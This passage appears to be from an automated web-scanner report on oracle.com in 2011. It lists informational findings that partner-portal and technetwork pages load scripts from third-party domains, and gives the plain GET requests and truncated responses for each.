http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/membership/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~78AF76AF916002D08B498B41520EA8BD251D26B521CA49025ABAACD4B03C3D211EE3F8C5529D98C93928B8768C2E3116EE45DF77E5B99FE77EAA8CF625031AAB7AD2FA28BE1F5BF11766C7B0F6A9E508E0899C6AE942E9E061B8A62AF0793673F397D8FF23E173F0244125680C5D9B5A07CBB5680B512C8FB55ADA522983072FB55B02C6F400C21B5E545C17F6AD9205F9E0EF802970F76BDE558FD043ABDF89C6817BFE4AAB6F58B661B54838EB6C054705CC05AC81481BC360B5C6A9E5B02E08065457F5361738E31E07FBA29B43D261D48574E99822D4CD7C83B87440FB879865D82DA605078321BB8220EA3DF565F2998EE4507C1D46BAD46C5F11058C59E2E6245C24BA50EEF20A15CB8869F7F0EBB3B47D1B82295D5D869B13361754E1F268AEF3E189072BF2EFD9C0028589AD
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41072152049770208,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.176. http://www.oracle.com/partners/secure/news/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/news/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/news/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~78AF76AF916002D08B498B41520EA8BD251D26B521CA49025ABAACD4B03C3D211EE3F8C5529D98C93928B8768C2E3116EE45DF77E5B99FE77EAA8CF625031AAB7AD2FA28BE1F5BF11766C7B0F6A9E508E0899C6AE942E9E061B8A62AF0793673F397D8FF23E173F0244125680C5D9B5A07CBB5680B512C8FB55ADA522983072FB55B02C6F400C21B5E545C17F6AD9205F9E0EF802970F76BDE558FD043ABDF89C6817BFE4AAB6F58B661B54838EB6C058FAB9E91C1E4E4729D76AEC00EBC7FF0B96933B1A05D1139096C2D6BBFFEA0C82D8D9A6B7A2FEA0CD0B87F592CB09FE2D7E24D9A0083B12EDC543DF3CB62B1256DD5443D083175415AF13A93C1434C8E48A901184374008E401D1B795233CC65F75712489266DB06F12871EA9F3DD0E4DCA87C6B10E81257
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41072182114541814,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.177. http://www.oracle.com/partners/secure/news/worldwide-opn-newsletter/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/news/worldwide-opn-newsletter/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/news/worldwide-opn-newsletter/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~BFD4B48782C099CF9463E2B9F223CF8B2E10719CAC2AC15A0FB3594A7AB2353F1D40C84637B9A3D4BBA894B42FF9DF20284C60EE3042DF8EB042E7F33AEE7B9C27327819F72CAAFBBB9DE935211EA0DB21A4D08F316C8FB109EEE4C8F88BBA9A3EF42BB3F617D1B4B84EC0335035BA18C71BC50ACC7E6B7362A47555F01E23B50A3D99A6B4ABB726DFEB056F62AC3F179B508FAA080C64019AC81865069953DEC016FA154737D44EE48F14E26B2D04ECF2C4C8EE51335B534FEB30B8313D4968C8FDCB8F1EB973FA1DDB28E7AC725477CDE75D0B16A2573817FBF275409E8534411B59C0ABDDE950812C35A5BDD7AA5C79F3323B76F64C23CDC6394C0D438AB5CBCCFE73C0947815E4846DFEA8B75C3FC69D68154A5E8E958D6B29696CC7B30DBA5432CB888E34277839329632C035A080592A459AF557F2764A04EAF9BA585A3B915C6698611962
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41154061371073278,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.178. http://www.oracle.com/partners/secure/sales/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/sales/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/sales/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~BFD4B48782C099CF9463E2B9F223CF8B2E10719CAC2AC15A0FB3594A7AB2353F1D40C84637B9A3D4BBA894B42FF9DF20284C60EE3042DF8EB042E7F33AEE7B9C27327819F72CAAFBBB9DE935211EA0DB21A4D08F316C8FB109EEE4C8F88BBA9A3EF42BB3F617D1B4B84EC0335035BA18C71BC50ACC7E6B7362A47555F01E23B50A3D99A6B4ABB726DFEB056F62AC3F179B508FAA080C64019AC81865069953DEC016FA154737D44ECDD452910F012E41213ED4B601092B1107C9964425A960E91532B39636A013D4F6893C1448AAA9A10770F4A9D0DFC1FDD452496F815172D73357BA36C2CB2DED6B4535F407CBBF24665C148B673637E959EE21CB392556A81DA997BEA9317284ADFD3CEAC194E069269499C78D84B2C3BD9991F12CCBA9E3F325E5C512E1591C
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=35732013052224862,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.179. http://www.oracle.com/partners/secure/sales/partner-ordering-portal/partner-ordering-portal-020782.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/sales/partner-ordering-portal/partner-ordering-portal-020782.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/sales/partner-ordering-portal/partner-ordering-portal-020782.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~4CFBF0832F385047D56263574F154F80F2B29C36A9C31A5CCB53181D7E1A5A6D103E55B9F19C87D87B91556B1D77C47F6C7BE6E86C9E753BB44D8BAE4A030776A9F07A1F3E3C94CCDC6468F7B633D4C937F64313071A3B29FB74517F542D39839D36E0EF5110FFB59449D442CF5CFC012ACB1772489982548FF50FC60E1CB19575DD8A2936CF45A924A7C9B6B8360FD9CC62B72F8BFAAE4BC4E993A0C85A0D5F4C4414699B6DE3EFC92A5559C9F42E5C1B387D672F0407C4CB399D6877E2ECCDF4B7070D47C895502A2F466EFB74CACD2344A12AAECF3BFCD9FEA324E534D96CB8FA955E31483AD108139E4798EB18F59EB96D789668EB7398C74289B1A964CEAD46E3798819EB2224F86F5CF726680130A72E913B0B4524ABEE421161BBC21F50396DE6683A1B8C0EFD034C478D8667E42C13410AE372486FE1CD126BF0474B031A898AC1375D12B7410E87B9191975D6D64BE21119C4E1BF829F58BA7D9A771862B95F565990FA8550EA335366BF1BC6D2218718204620
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=35732734606742442,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.180. http://www.oracle.com/partners/secure/sales/pricing-licensing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/sales/pricing-licensing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/sales/pricing-licensing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~229223FEC64DCE047F94BAFDFC66940B9C83F38403EB5BAC1AA682F1DD7AF92795BB1A864B83C2FCA81D391472B85A4114206CBCF8B3CC5A7C013C27EB2D5AB582D28399C8FED1134622F1CD1AF2D7587151C3B74FECBA0C55FF8B8FC8D47005E13013BD14026D04753B065346AC69384FADEE6737C733727722143A21C94A5DA47AC37E489FAF8D98A126CF15ADC216F8ED0A94D1352D1B57C9D3F3AF06DB1774DFBFF456DD329A3F40CA363CEAC33D1F57AFF902AC03A371E80FC5BD4B47DF373C294D936CD8636B9657BE01C46D9819D4758E13B0756AA9819074721C72EA074CAE5D852C1C45E46DC53BC7ED29CD87010E9C7A93986FB54D1D1AEC330B47C41F300A418F25FA542DBB0C6F4DD25D6BBD2FE141A9930EEB6128E7AFABB4A731CEEB25EC3CDDE51D02563A1A7384D1E898F0C078E0FB7F3C5E01B1B1C7AB01155111147FB56D5D
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41140420554967896,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.181. http://www.oracle.com/partners/secure/sales/resell-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/sales/resell-support/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/sales/resell-support/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~E8AF3A13C9A10C4CEB5F05FE704E6145AE9721C5522886B8C204F4A52528C687424705B84106F4BD2DE4CAB313E4B39D1E0A1AA937BC0707ED5E85CB2F3563DACAF2050432A043DC6CC4F4E2A8BF81AB5259A2B8F0A0BDCF5655EB82D2349DD819BAB0A63D104B71A5616A9790BD2A4869D8947399971DE8DAF7A241044D474CDEAB522CC0759A3CB7A573D17D48F895EB1146E477F2FFF360249F1394522888884B11F47EB1789F9E31D2D0A8609AAA292EC913C2657E2F48B0A829246E2535BD971E13F2989558623AF374CD4EDA8F96D0175DFE2671430C5E30C223647CAC8AF6D9CBBA8A401D3BD276C73040187DEB50A0FC460389DCE39F90BF235F2F85498BE2DC70C523F5D7810687AF562764F83D79A28698E3104517166A060D25E26CBE4538FA35BFB494FB5BBB94C654ABC01368B1CED8B523F7D34C69E14BB996
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=35982882092010873,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.182. http://www.oracle.com/partners/secure/sales/sales-kits/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/sales/sales-kits/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/sales/sales-kits/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~D9B6E1786FB4908A2F1A6E49DDB9F87B194669B190A3714E46A76775F53A4D51C6D4EB86D464CBF7C6E858605511CD42137B9CEB1DE2601A143E36B165AAEB5FF6465DF85AEA2427DCFF345CF1D4F287F06E38EC96BFF3F5E11D9FECF47BD170736FD79628DF2A1E9964D6D2D93795D67106C56386DB96D0CF582A9BD2E11D8A063A814D569F0AE660D7EB3FAB0945785355C5B7F766D46CE637C6AF4547C4B9CD231BF05BB14DA73771E7F3F6DDEA03803DF46C049E3AC2403ED865678655825DD38E2E17BE8EF12F7B732608B12D132794608199CA7876C33E194CBCAA53C0E4E09FB35DFECFF64140BA555D3CFDD74E225A2DE980E1463BF06752CC6E2A3EAE3810293CB96758ECC53D4F4EA28834F2EF351A1FD1799F8EF2F12E0F43EAB9857196F00DE58E12587BFE1090B30A3A89D8307920F2C3CC5F6E1C820ACA4F19
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=35982912156782475,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.183. http://www.oracle.com/partners/secure/support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/secure/support/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Request

GET /partners/secure/support/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~D9B6E1786FB4908A2F1A6E49DDB9F87B194669B190A3714E46A76775F53A4D51C6D4EB86D464CBF7C6E858605511CD42137B9CEB1DE2601A143E36B165AAEB5FF6465DF85AEA2427DCFF345CF1D4F287F06E38EC96BFF3F5E11D9FECF47BD170736FD79628DF2A1E9964D6D2D93795D67106C56386DB96D0CF582A9BD2E11D8A063A814D569F0AE660D7EB3FAB0945785355C5B7F766D46CE637C6AF4547C4B9CD231BF05BB14DA7242433D32DF5A69AAEC3FCBD9E5045F53E2442A71DA6EDC8BD10553C694A356E44C392CD239070F34DCC9436C99E41620D13E4DB2F1063CC3BEF340FE6FC3D334B1FF4C2A51D7D12D653B39DC287296C09127D9CDE618E224C427EBF31AD840E6A6FA952B0476BA4622F98759F81B7AAA1E2392370D56759276F6A816B3696C1
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41155727818412421,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.184. http://www.oracle.com/technetwork/apps-tech/index-095827.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/apps-tech/index-095827.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/apps-tech/index-095827.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41155766473119038,0:1)
Date: Tue, 06 Sep 2011 16:09:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.185. http://www.oracle.com/technetwork/apps-tech/index-097651.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/apps-tech/index-097651.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/apps-tech/index-097651.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35983045300771156,0:1)
Date: Tue, 06 Sep 2011 16:09:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128917

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.186. http://www.oracle.com/technetwork/apps-tech/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/apps-tech/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/apps-tech/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41074097669987687,0:1)
Date: Tue, 06 Sep 2011 16:09:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.187. http://www.oracle.com/technetwork/architect/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/architect/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

